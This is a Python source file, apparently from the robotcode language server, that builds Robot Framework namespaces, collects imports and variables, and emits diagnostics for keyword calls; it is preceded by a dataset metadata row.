| 34.570588 | 86 | 0.532244 | 547 | 5,877 | 5.531993 | 0.241316 | 0.069068 | 0.087905 | 0.07733 | 0.544613 | 0.521481 | 0.479841 | 0.447455 | 0.447455 | 0.424323 | 0 | 0.051519 | 0.299813 | 5,877 | 169 | 87 | 34.775148 | 0.68384 | 0.038965 | 0 | 0.451389 | 0 | 0 | 0.330898 | 0.059159 | 0 | 0 | 0 | 0 | 0.048611 | 1 | 0.055556 | false | 0 | 0.027778 | 0 | 0.090278 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c88328d2f2e6bbd1db0fc76c3be87f48859e1ad | 65,821 | py | Python | robotcode/language_server/robotframework/diagnostics/namespace.py | mardukbp/robotcode | 0b34cf6e7931423117036fcf70f74e27da0cfb0f | [
"Apache-2.0"
] | null | null | null | robotcode/language_server/robotframework/diagnostics/namespace.py | mardukbp/robotcode | 0b34cf6e7931423117036fcf70f74e27da0cfb0f | [
"Apache-2.0"
] | null | null | null | robotcode/language_server/robotframework/diagnostics/namespace.py | mardukbp/robotcode | 0b34cf6e7931423117036fcf70f74e27da0cfb0f | [
"Apache-2.0"
] | null | null | null | from __future__ import annotations
import ast
import asyncio
import itertools
import weakref
from collections import OrderedDict
from dataclasses import dataclass, field
from enum import Enum
from pathlib import Path
from typing import (
Any,
AsyncIterator,
Callable,
Dict,
Iterable,
List,
NamedTuple,
Optional,
Sequence,
Tuple,
cast,
)
from ....utils.async_itertools import async_chain
from ....utils.logging import LoggingDescriptor
from ....utils.uri import Uri
from ...common.lsp_types import (
Diagnostic,
DiagnosticRelatedInformation,
DiagnosticSeverity,
DiagnosticTag,
Location,
Position,
Range,
)
from ...common.text_document import TextDocument
from ..utils.ast import (
Token,
is_non_variable_token,
range_from_node,
range_from_token_or_node,
tokenize_variables,
)
from ..utils.async_ast import AsyncVisitor
from .imports_manager import ImportsManager
from .library_doc import (
BUILTIN_LIBRARY_NAME,
BUILTIN_VARIABLES,
DEFAULT_LIBRARIES,
KeywordDoc,
KeywordMatcher,
LibraryDoc,
VariableMatcher,
is_embedded_keyword,
)
DIAGNOSTICS_SOURCE_NAME = "robotcode.namespace"
class DiagnosticsError(Exception):
pass
class DiagnosticsWarningError(DiagnosticsError):
pass
class ImportError(DiagnosticsError):
pass
@dataclass
class SourceEntity:
line_no: int
col_offset: int
end_line_no: int
end_col_offset: int
source: str
@dataclass
class Import(SourceEntity):
name: Optional[str]
name_token: Optional[Token]
def range(self) -> Range:
return Range(
start=Position(
line=self.name_token.lineno - 1 if self.name_token is not None else self.line_no - 1,
character=self.name_token.col_offset if self.name_token is not None else self.col_offset,
),
end=Position(
line=self.name_token.lineno - 1 if self.name_token is not None else self.end_line_no - 1,
character=self.name_token.end_col_offset if self.name_token is not None else self.end_col_offset,
),
)
@dataclass
class LibraryImport(Import):
args: Tuple[str, ...] = ()
alias: Optional[str] = None
def __hash__(self) -> int:
return hash(
(
type(self),
self.name,
self.args,
self.alias,
)
)
@dataclass
class ResourceImport(Import):
def __hash__(self) -> int:
return hash(
(
type(self),
self.name,
)
)
@dataclass
class VariablesImport(Import):
args: Tuple[str, ...] = ()
def __hash__(self) -> int:
return hash(
(
type(self),
self.name,
self.args,
)
)
class VariableDefinitionType(Enum):
VARIABLE = "variable"
ARGUMENT = "argument"
COMMAND_LINE_VARIABLE = "command line variable"
BUILTIN_VARIABLE = "builtin variable"
@dataclass
class VariableDefinition(SourceEntity):
name: Optional[str]
name_token: Optional[Token]
type: VariableDefinitionType = VariableDefinitionType.VARIABLE
def __hash__(self) -> int:
return hash((type(self), self.name, self.type))
def range(self) -> Range:
return Range(
start=Position(
line=self.line_no - 1,
character=self.col_offset,
),
end=Position(
line=self.end_line_no - 1,
character=self.end_col_offset,
),
)
@dataclass
class BuiltInVariableDefinition(VariableDefinition):
type: VariableDefinitionType = VariableDefinitionType.BUILTIN_VARIABLE
def __hash__(self) -> int:
return hash((type(self), self.name, self.type))
@dataclass
class CommandLineVariableDefinition(VariableDefinition):
type: VariableDefinitionType = VariableDefinitionType.COMMAND_LINE_VARIABLE
def __hash__(self) -> int:
return hash((type(self), self.name, self.type))
@dataclass
class ArgumentDefinition(VariableDefinition):
type: VariableDefinitionType = VariableDefinitionType.ARGUMENT
def __hash__(self) -> int:
return hash((type(self), self.name, self.type))
class NameSpaceError(Exception):
pass
class VariablesVisitor(AsyncVisitor):
async def get(self, source: str, model: ast.AST) -> List[VariableDefinition]:
self._results: List[VariableDefinition] = []
self.source = source
await self.visit(model)
return self._results
async def visit_Section(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.model.blocks import VariableSection
if isinstance(node, VariableSection):
await self.generic_visit(node)
async def visit_Variable(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token
from robot.parsing.model.statements import Variable
n = cast(Variable, node)
name = n.get_token(Token.VARIABLE)
if n.name:
self._results.append(
VariableDefinition(
name=n.name,
name_token=name if name is not None else None,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno if node.end_lineno is not None else -1,
end_col_offset=node.end_col_offset if node.end_col_offset is not None else -1,
source=self.source,
)
)
class BlockVariableVisitor(AsyncVisitor):
async def get(self, source: str, model: ast.AST, position: Optional[Position] = None) -> List[VariableDefinition]:
self.source = source
self.position = position
self._results: List[VariableDefinition] = []
await self.visit(model)
return self._results
async def visit(self, node: ast.AST) -> None:
if self.position is None or self.position >= range_from_node(node).start:
return await super().visit(node)
async def visit_KeywordName(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import KeywordName
from robot.variables.search import VariableSearcher
n = cast(KeywordName, node)
name_token = cast(Token, n.get_token(RobotToken.KEYWORD_NAME))
if name_token is not None and name_token.value:
for a in filter(
lambda e: e.type == RobotToken.VARIABLE,
tokenize_variables(name_token, identifiers="$", ignore_errors=True),
):
if a.value:
searcher = VariableSearcher("$", ignore_errors=True)
match = searcher.search(a.value)
if match.base is None:
continue
name = f"{match.identifier}{{{match.base.split(':', 1)[0]}}}"
self._results.append(
ArgumentDefinition(
name=name,
name_token=a,
line_no=a.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno
if node.end_lineno is not None
else a.lineno
if a.lineno is not None
else -1,
end_col_offset=node.end_col_offset
if node.end_col_offset is not None
else a.end_col_offset
if name_token.end_col_offset is not None
else -1,
source=self.source,
)
)
async def visit_Arguments(self, node: ast.AST) -> None: # noqa: N802
from robot.errors import VariableError
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import Arguments
n = cast(Arguments, node)
arguments = n.get_tokens(RobotToken.ARGUMENT)
for argument1 in (cast(RobotToken, e) for e in arguments):
try:
argument = None
try:
argument = next(
(
v
for v in itertools.dropwhile(
lambda t: t.type in RobotToken.NON_DATA_TOKENS, argument1.tokenize_variables()
)
if v.type == RobotToken.VARIABLE
),
None,
)
except VariableError:
pass
if argument is not None:
self._results.append(
ArgumentDefinition(
name=argument.value,
name_token=argument,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno
if node.end_lineno is not None
else argument.lineno
if argument.lineno is not None
else -1,
end_col_offset=node.end_col_offset
if node.end_col_offset is not None
else argument.end_col_offset
if argument.end_col_offset is not None
else -1,
source=self.source,
)
)
except VariableError:
pass
async def visit_KeywordCall(self, node: ast.AST) -> None: # noqa: N802
from robot.errors import VariableError
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import KeywordCall
from robot.variables.search import contains_variable
try:
n = cast(KeywordCall, node)
assign_token = n.get_token(RobotToken.ASSIGN)
if assign_token is not None and assign_token.value and contains_variable(assign_token.value):
self._results.append(
VariableDefinition(
name=assign_token.value,
name_token=assign_token,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno
if node.end_lineno is not None
else assign_token.lineno
if assign_token.lineno is not None
else -1,
end_col_offset=node.end_col_offset
if node.end_col_offset is not None
else assign_token.end_col_offset
if assign_token.end_col_offset is not None
else -1,
source=self.source,
)
)
except VariableError:
pass
async def visit_ForHeader(self, node: ast.AST) -> None: # noqa: N802
from robot.errors import VariableError
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import ForHeader
from robot.variables.search import contains_variable
try:
n = cast(ForHeader, node)
variables = n.get_tokens(RobotToken.VARIABLE)
for variable in variables:
if variable is not None and variable.value and contains_variable(variable.value):
self._results.append(
VariableDefinition(
name=variable.value,
name_token=variable,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno
if node.end_lineno is not None
else variable.lineno
if variable.lineno is not None
else -1,
end_col_offset=node.end_col_offset
if node.end_col_offset is not None
else variable.end_col_offset
if variable.end_col_offset is not None
else -1,
source=self.source,
)
)
except VariableError:
pass
class ImportVisitor(AsyncVisitor):
async def get(self, source: str, model: ast.AST) -> List[Import]:
self._results: List[Import] = []
self.source = source
await self.visit(model)
return self._results
async def visit_Section(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.model.blocks import SettingSection
if isinstance(node, SettingSection):
await self.generic_visit(node)
async def visit_LibraryImport(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import LibraryImport as RobotLibraryImport
n = cast(RobotLibraryImport, node)
name = cast(RobotToken, n.get_token(RobotToken.NAME))
self._results.append(
LibraryImport(
name=n.name,
name_token=name if name is not None else None,
args=n.args,
alias=n.alias,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno if node.end_lineno is not None else -1,
end_col_offset=node.end_col_offset if node.end_col_offset is not None else -1,
source=self.source,
)
)
async def visit_ResourceImport(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import ResourceImport as RobotResourceImport
n = cast(RobotResourceImport, node)
name = cast(RobotToken, n.get_token(RobotToken.NAME))
self._results.append(
ResourceImport(
name=n.name,
name_token=name if name is not None else None,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno if node.end_lineno is not None else -1,
end_col_offset=node.end_col_offset if node.end_col_offset is not None else -1,
source=self.source,
)
)
async def visit_VariablesImport(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import (
VariablesImport as RobotVariablesImport,
)
n = cast(RobotVariablesImport, node)
name = cast(RobotToken, n.get_token(RobotToken.NAME))
self._results.append(
VariablesImport(
name=n.name,
name_token=name if name is not None else None,
args=n.args,
line_no=node.lineno,
col_offset=node.col_offset,
end_line_no=node.end_lineno if node.end_lineno is not None else -1,
end_col_offset=node.end_col_offset if node.end_col_offset is not None else -1,
source=self.source,
)
)
class Analyzer(AsyncVisitor):
async def get(self, model: ast.AST, namespace: Namespace) -> List[Diagnostic]:
self._results: List[Diagnostic] = []
self._namespace = namespace
self.current_testcase_or_keyword_name: Optional[str] = None
await self.visit(model)
return self._results
async def _analyze_keyword_call(
self,
keyword: Optional[str],
value: ast.AST,
keyword_token: Token,
argument_tokens: List[Token],
analyse_run_keywords: bool = True,
) -> Optional[KeywordDoc]:
result: Optional[KeywordDoc] = None
try:
finder = KeywordFinder(self._namespace)
result = await finder.find_keyword(keyword)
for e in finder.diagnostics:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, keyword_token),
message=e.message,
severity=e.severity,
source=DIAGNOSTICS_SOURCE_NAME,
code=e.code,
)
)
if result is not None:
if result.errors:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, keyword_token),
message="Keyword definition contains errors.",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
related_information=[
DiagnosticRelatedInformation(
location=Location(
uri=str(
Uri.from_path(
err.source
if err.source is not None
else result.source
if result.source is not None
else "/<unknown>"
)
),
range=Range(
start=Position(
line=err.line_no - 1
if err.line_no is not None
else result.line_no
if result.line_no >= 0
else 0,
character=0,
),
end=Position(
line=err.line_no - 1
if err.line_no is not None
else result.line_no
if result.line_no >= 0
else 0,
character=0,
),
),
),
message=err.message,
)
for err in result.errors
],
)
)
if result.is_deprecated:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, keyword_token),
message=f"Keyword '{result.name}' is deprecated"
f"{f': {result.deprecated_message}' if result.deprecated_message else ''}.",
severity=DiagnosticSeverity.HINT,
source=DIAGNOSTICS_SOURCE_NAME,
tags=[DiagnosticTag.Deprecated],
)
)
if result.is_error_handler:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, keyword_token),
message=f"Keyword definition contains errors: {result.error_handler_message}",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
)
)
except (asyncio.CancelledError, SystemExit, KeyboardInterrupt):
raise
except BaseException as e:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, keyword_token),
message=str(e),
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code=type(e).__qualname__,
)
)
if result is not None and analyse_run_keywords:
await self._analyse_run_keyword(result, value, argument_tokens)
return result
async def _analyse_run_keyword(
self, keyword_doc: Optional[KeywordDoc], node: ast.AST, argument_tokens: List[Token]
) -> List[Token]:
if keyword_doc is None or not keyword_doc.is_any_run_keyword():
return argument_tokens
if keyword_doc.is_run_keyword() and len(argument_tokens) > 0 and is_non_variable_token(argument_tokens[0]):
await self._analyze_keyword_call(argument_tokens[0].value, node, argument_tokens[0], argument_tokens[1:])
return argument_tokens[1:]
elif (
keyword_doc.is_run_keyword_with_condition()
and len(argument_tokens) > 1
and is_non_variable_token(argument_tokens[1])
):
await self._analyze_keyword_call(argument_tokens[1].value, node, argument_tokens[1], argument_tokens[2:])
return argument_tokens[2:]
elif keyword_doc.is_run_keywords():
for t in argument_tokens:
if is_non_variable_token(t):
await self._analyze_keyword_call(t.value, node, t, [])
return []
elif keyword_doc.is_run_keyword_if() and len(argument_tokens) > 1 and is_non_variable_token(argument_tokens[1]):
def skip_args() -> None:
nonlocal argument_tokens
while argument_tokens:
if argument_tokens[0].value in ["ELSE", "ELSE IF"]:
break
argument_tokens = argument_tokens[1:]
result = await self._analyze_keyword_call(
argument_tokens[1].value,
node,
argument_tokens[1],
argument_tokens[2:],
analyse_run_keywords=False,
)
argument_tokens = argument_tokens[2:]
if result is not None and result.is_any_run_keyword():
argument_tokens = await self._analyse_run_keyword(result, node, argument_tokens)
skip_args()
while argument_tokens:
if argument_tokens[0].value == "ELSE" and len(argument_tokens) > 1:
result = await self._analyze_keyword_call(
argument_tokens[1].value,
node,
argument_tokens[1],
argument_tokens[2:],
analyse_run_keywords=False,
)
argument_tokens = argument_tokens[2:]
if result is not None and result.is_any_run_keyword():
argument_tokens = await self._analyse_run_keyword(result, node, argument_tokens)
skip_args()
break
elif argument_tokens[0].value == "ELSE IF" and len(argument_tokens) > 2:
result = await self._analyze_keyword_call(
argument_tokens[2].value,
node,
argument_tokens[2],
argument_tokens[3:],
analyse_run_keywords=False,
)
argument_tokens = argument_tokens[3:]
if result is not None and result.is_any_run_keyword():
argument_tokens = await self._analyse_run_keyword(result, node, argument_tokens)
skip_args()
else:
break
return argument_tokens
async def visit_Fixture(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import Fixture
value = cast(Fixture, node)
keyword_token = cast(Token, value.get_token(RobotToken.NAME))
# TODO: calculate possible variables in NAME
if keyword_token is not None and is_non_variable_token(keyword_token):
await self._analyze_keyword_call(
value.name, value, keyword_token, [cast(Token, e) for e in value.get_tokens(RobotToken.ARGUMENT)]
)
await self.generic_visit(node)
async def visit_TestTemplate(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import TestTemplate
value = cast(TestTemplate, node)
keyword_token = cast(Token, value.get_token(RobotToken.NAME))
# TODO: calculate possible variables in NAME
if keyword_token is not None and is_non_variable_token(keyword_token):
await self._analyze_keyword_call(value.value, value, keyword_token, [])
await self.generic_visit(node)
async def visit_Template(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import Template
value = cast(Template, node)
keyword_token = cast(Token, value.get_token(RobotToken.NAME))
# TODO: calculate possible variables in NAME
if keyword_token is not None and is_non_variable_token(keyword_token):
await self._analyze_keyword_call(value.value, value, keyword_token, [])
await self.generic_visit(node)
async def visit_KeywordCall(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.statements import KeywordCall
value = cast(KeywordCall, node)
keyword_token = cast(RobotToken, value.get_token(RobotToken.KEYWORD))
if value.assign and not value.keyword:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, value.get_token(RobotToken.ASSIGN)),
message="Keyword name cannot be empty.",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code="KeywordError",
)
)
else:
await self._analyze_keyword_call(
value.keyword, value, keyword_token, [cast(Token, e) for e in value.get_tokens(RobotToken.ARGUMENT)]
)
if not self.current_testcase_or_keyword_name:
self._results.append(
Diagnostic(
range=range_from_token_or_node(value, value.get_token(RobotToken.ASSIGN)),
message="Code is unreachable.",
severity=DiagnosticSeverity.HINT,
source=DIAGNOSTICS_SOURCE_NAME,
tags=[DiagnosticTag.Unnecessary],
)
)
await self.generic_visit(node)
async def visit_TestCase(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.blocks import TestCase
from robot.parsing.model.statements import TestCaseName
testcase = cast(TestCase, node)
if not testcase.name:
name_token = cast(TestCaseName, testcase.header).get_token(RobotToken.TESTCASE_NAME)
self._results.append(
Diagnostic(
range=range_from_token_or_node(testcase, name_token),
message="Test case name cannot be empty.",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code="KeywordError",
)
)
self.current_testcase_or_keyword_name = testcase.name
try:
await self.generic_visit(node)
finally:
self.current_testcase_or_keyword_name = None
async def visit_Keyword(self, node: ast.AST) -> None: # noqa: N802
from robot.parsing.lexer.tokens import Token as RobotToken
from robot.parsing.model.blocks import Keyword
from robot.parsing.model.statements import Arguments, KeywordName
keyword = cast(Keyword, node)
if keyword.name:
name_token = cast(KeywordName, keyword.header).get_token(RobotToken.KEYWORD_NAME)
if is_embedded_keyword(keyword.name) and any(
isinstance(v, Arguments) and len(v.values) > 0 for v in keyword.body
):
self._results.append(
Diagnostic(
range=range_from_token_or_node(keyword, name_token),
message="Keyword cannot have both normal and embedded arguments.",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code="KeywordError",
)
)
else:
name_token = cast(KeywordName, keyword.header).get_token(RobotToken.KEYWORD_NAME)
self._results.append(
Diagnostic(
range=range_from_token_or_node(keyword, name_token),
message="Keyword name cannot be empty.",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code="KeywordError",
)
)
self.current_testcase_or_keyword_name = keyword.name
try:
await self.generic_visit(node)
finally:
self.current_testcase_or_keyword_name = None
@dataclass
class LibraryEntry:
name: str
import_name: str
library_doc: LibraryDoc
args: Tuple[Any, ...] = ()
alias: Optional[str] = None
import_range: Range = field(default_factory=lambda: Range.zero())
import_source: str = ""
def __str__(self) -> str:
result = self.import_name
if self.args:
result += f" {str(self.args)}"
if self.alias:
result += f" WITH NAME {self.alias}"
return result
@dataclass
class ResourceEntry(LibraryEntry):
imports: List[Import] = field(default_factory=lambda: [])
variables: List[VariableDefinition] = field(default_factory=lambda: [])
@dataclass
class VariablesEntry(LibraryEntry):
pass
class Namespace:
_logger = LoggingDescriptor()
@_logger.call
def __init__(
self,
imports_manager: ImportsManager,
model: ast.AST,
source: str,
invalidated_callback: Callable[[Namespace], None],
document: Optional[TextDocument] = None,
) -> None:
super().__init__()
self.imports_manager = imports_manager
self.imports_manager.libraries_changed.add(self.libraries_changed)
self.imports_manager.resources_changed.add(self.resources_changed)
self.model = model
self.source = source
self.invalidated_callback = invalidated_callback
self._document = weakref.ref(document) if document is not None else None
self._libraries: OrderedDict[str, LibraryEntry] = OrderedDict()
self._resources: OrderedDict[str, ResourceEntry] = OrderedDict()
self._variables: OrderedDict[str, VariablesEntry] = OrderedDict()
self._initialized = False
self._initialize_lock = asyncio.Lock()
self._analyzed = False
self._analyze_lock = asyncio.Lock()
self._library_doc: Optional[LibraryDoc] = None
self._imports: Optional[List[Import]] = None
self._own_variables: Optional[List[VariableDefinition]] = None
self._diagnostics: List[Diagnostic] = []
self._keywords: Optional[List[KeywordDoc]] = None
self._loop = asyncio.get_event_loop()
# TODO: how to get the search order from model
self.search_order: Tuple[str, ...] = ()
@property
def document(self) -> Optional[TextDocument]:
return self._document() if self._document is not None else None
async def libraries_changed(self, sender: Any, params: List[LibraryDoc]) -> None:
for p in params:
if any(e for e in self._libraries.values() if e.library_doc == p):
self.invalidated_callback(self)
break
async def resources_changed(self, sender: Any, params: List[LibraryDoc]) -> None:
for p in params:
if any(e for e in self._resources.values() if e.library_doc.source == p.source):
self.invalidated_callback(self)
break
@_logger.call
async def get_diagnostisc(self) -> List[Diagnostic]:
await self.ensure_initialized()
await self._analyze()
return self._diagnostics
@_logger.call
async def get_libraries(self) -> OrderedDict[str, LibraryEntry]:
await self.ensure_initialized()
return self._libraries
@_logger.call
async def get_resources(self) -> OrderedDict[str, ResourceEntry]:
await self.ensure_initialized()
return self._resources
async def get_library_doc(self) -> LibraryDoc:
from ..parts.documents_cache import DocumentType
if self._library_doc is None:
model_type = ""
if hasattr(self.model, "model_type"):
t = getattr(self.model, "model_type")
if t == DocumentType.RESOURCE:
model_type = "RESOURCE"
elif t == DocumentType.GENERAL:
model_type = "TESTCASE"
elif t == DocumentType.INIT:
model_type = "INIT"
self._library_doc = await self.imports_manager.get_libdoc_from_model(
self.model, self.source, model_type=model_type
)
return self._library_doc
@_logger.call
async def ensure_initialized(self) -> bool:
async with self._initialize_lock:
if not self._initialized:
imports = await self.get_imports()
if self.document is not None:
old_imports: List[Import] = self.document.get_data(Namespace)
if old_imports is None:
self.document.set_data(Namespace, imports)
elif old_imports != imports:
new_imports = []
for e in old_imports:
if e in imports:
new_imports.append(e)
for e in imports:
if e not in new_imports:
new_imports.append(e)
self.document.set_data(Namespace, new_imports)
await self._import_default_libraries()
await self._import_imports(imports, str(Path(self.source).parent), top_level=True)
self._initialized = True
return self._initialized
@property
def initialized(self) -> bool:
return self._initialized
async def get_imports(self) -> List[Import]:
if self._imports is None:
self._imports = await ImportVisitor().get(self.source, self.model)
return self._imports
async def get_own_variables(self) -> List[VariableDefinition]:
if self._own_variables is None:
self._own_variables = await VariablesVisitor().get(self.source, self.model)
return self._own_variables
_builtin_variables: Optional[List[BuiltInVariableDefinition]] = None
@classmethod
def get_builtin_variables(cls) -> List[BuiltInVariableDefinition]:
if cls._builtin_variables is None:
cls._builtin_variables = [BuiltInVariableDefinition(0, 0, 0, 0, "", n, None) for n in BUILTIN_VARIABLES]
return cls._builtin_variables
def get_command_line_variables(self) -> List[VariableDefinition]:
if self.imports_manager.config is None:
return []
return [
CommandLineVariableDefinition(0, 0, 0, 0, "", f"${{{k}}}", None)
for k in self.imports_manager.config.variables.keys()
]
async def get_variables(
self, nodes: Optional[List[ast.AST]] = None, position: Optional[Position] = None
) -> Dict[VariableMatcher, VariableDefinition]:
from robot.parsing.model.blocks import Keyword, TestCase
await self.ensure_initialized()
result: Dict[VariableMatcher, VariableDefinition] = {}
async for var in async_chain(
*[
await BlockVariableVisitor().get(self.source, n, position)
for n in nodes or []
if isinstance(n, (Keyword, TestCase))
],
(e for e in await self.get_own_variables()),
*(e.variables for e in self._resources.values()),
(e for e in self.get_command_line_variables()),
(e for e in self.get_builtin_variables()),
):
if var.name is not None and VariableMatcher(var.name) not in result.keys():
result[VariableMatcher(var.name)] = var
return result
async def find_variable(
self, name: str, nodes: Optional[List[ast.AST]], position: Optional[Position] = None
) -> Optional[VariableDefinition]:
return (await self.get_variables(nodes, position)).get(VariableMatcher(name), None)
async def _import_imports(self, imports: Iterable[Import], base_dir: str, *, top_level: bool = False) -> None:
async def _import(value: Import) -> Optional[LibraryEntry]:
result: Optional[LibraryEntry] = None
try:
if isinstance(value, LibraryImport):
if value.name is None:
raise NameSpaceError("Library setting requires value.")
result = await self._get_library_entry(
value.name, value.args, value.alias, base_dir, sentinel=value
)
result.import_range = value.range()
result.import_source = value.source
if (
top_level
and result.library_doc.errors is None
and (len(result.library_doc.keywords) == 0 and not bool(result.library_doc.has_listener))
):
self._diagnostics.append(
Diagnostic(
range=value.range(),
message=f"Imported library '{value.name}' contains no keywords.",
severity=DiagnosticSeverity.WARNING,
source=DIAGNOSTICS_SOURCE_NAME,
)
)
elif isinstance(value, ResourceImport):
if value.name is None:
raise NameSpaceError("Resource setting requires value.")
source = await self.imports_manager.find_file(value.name, base_dir)
# allready imported
if any(r for r in self._resources.values() if r.library_doc.source == source):
return None
result = await self._get_resource_entry(value.name, base_dir, sentinel=value)
result.import_range = value.range()
result.import_source = value.source
if top_level and (
not result.library_doc.errors
and top_level
and not result.imports
and not result.variables
and not result.library_doc.keywords
):
self._diagnostics.append(
Diagnostic(
range=value.range(),
message=f"Imported resource file '{value.name}' is empty.",
severity=DiagnosticSeverity.WARNING,
source=DIAGNOSTICS_SOURCE_NAME,
)
)
elif isinstance(value, VariablesImport):
# TODO: variables
# if value.name is None:
# raise NameSpaceError("Variables setting requires value.")
# result = await self._get_variables_entry(value.name, value.args, base_dir)
# result.import_range = value.range()
# result.import_source = value.source
pass
else:
raise DiagnosticsError("Unknown import type.")
if top_level and result is not None:
if result.library_doc.source is not None and result.library_doc.errors:
if any(err.source for err in result.library_doc.errors):
self._diagnostics.append(
Diagnostic(
range=value.range(),
message="Import definition contains errors.",
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
related_information=[
DiagnosticRelatedInformation(
location=Location(
uri=str(Uri.from_path(err.source)),
range=Range(
start=Position(
line=err.line_no - 1
if err.line_no is not None
else result.library_doc.line_no
if result.library_doc.line_no >= 0
else 0,
character=0,
),
end=Position(
line=err.line_no - 1
if err.line_no is not None
else result.library_doc.line_no
if result.library_doc.line_no >= 0
else 0,
character=0,
),
),
),
message=err.message,
)
for err in result.library_doc.errors
if err.source is not None
],
)
)
for err in filter(lambda e: e.source is None, result.library_doc.errors):
self._diagnostics.append(
Diagnostic(
range=value.range(),
message=err.message,
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code=err.type_name,
)
)
elif result.library_doc.errors is not None:
for err in result.library_doc.errors:
self._diagnostics.append(
Diagnostic(
range=value.range(),
message=err.message,
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code=err.type_name,
)
)
except (asyncio.CancelledError, SystemExit, KeyboardInterrupt):
raise
except BaseException as e:
if top_level:
self._diagnostics.append(
Diagnostic(
range=value.range(),
message=str(e),
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code=type(e).__qualname__,
)
)
return result
for entry in await asyncio.gather(*(_import(v) for v in imports), return_exceptions=True):
if isinstance(entry, (asyncio.CancelledError, SystemExit, KeyboardInterrupt)):
raise entry
if entry is not None:
if isinstance(entry, ResourceEntry):
assert entry.library_doc.source is not None
allready_imported_resources = [
e for e in self._resources.values() if e.library_doc.source == entry.library_doc.source
]
if not allready_imported_resources and entry.library_doc.source != self.source:
self._resources[entry.import_name] = entry
try:
await self._import_imports(
entry.imports,
str(Path(entry.library_doc.source).parent),
top_level=False,
)
except (asyncio.CancelledError, SystemExit, KeyboardInterrupt):
raise
except BaseException as e:
if top_level:
self._diagnostics.append(
Diagnostic(
range=entry.import_range,
message=str(e) or type(entry).__name__,
severity=DiagnosticSeverity.ERROR,
source=DIAGNOSTICS_SOURCE_NAME,
code=type(e).__qualname__,
)
)
else:
if top_level:
if entry.library_doc.source == self.source:
self._diagnostics.append(
Diagnostic(
range=entry.import_range,
message="Recursive resource import.",
severity=DiagnosticSeverity.INFORMATION,
source=DIAGNOSTICS_SOURCE_NAME,
)
)
elif allready_imported_resources and allready_imported_resources[0].library_doc.source:
self._resources[entry.import_name] = entry
self._diagnostics.append(
Diagnostic(
range=entry.import_range,
message="Resource already imported.",
severity=DiagnosticSeverity.INFORMATION,
source=DIAGNOSTICS_SOURCE_NAME,
related_information=[
DiagnosticRelatedInformation(
location=Location(
uri=str(
Uri.from_path(allready_imported_resources[0].import_source)
),
range=allready_imported_resources[0].import_range,
),
message="",
)
],
)
)
else:
if entry.name == BUILTIN_LIBRARY_NAME and entry.alias is None:
self._diagnostics.append(
Diagnostic(
range=entry.import_range,
message=f'Library "{entry}" is not imported,'
' because it would override the "BuiltIn" library.',
severity=DiagnosticSeverity.INFORMATION,
source=DIAGNOSTICS_SOURCE_NAME,
related_information=[
DiagnosticRelatedInformation(
location=Location(
uri=str(Uri.from_path(entry.import_source)),
range=entry.import_range,
),
message="",
)
],
)
)
continue
allready_imported_library = [
e
for e in self._libraries.values()
if e.library_doc.source == entry.library_doc.source
and e.alias == entry.alias
and e.args == entry.args
]
if top_level and allready_imported_library and allready_imported_library[0].library_doc.source:
self._diagnostics.append(
Diagnostic(
range=entry.import_range,
message=f'Library "{entry}" already imported.',
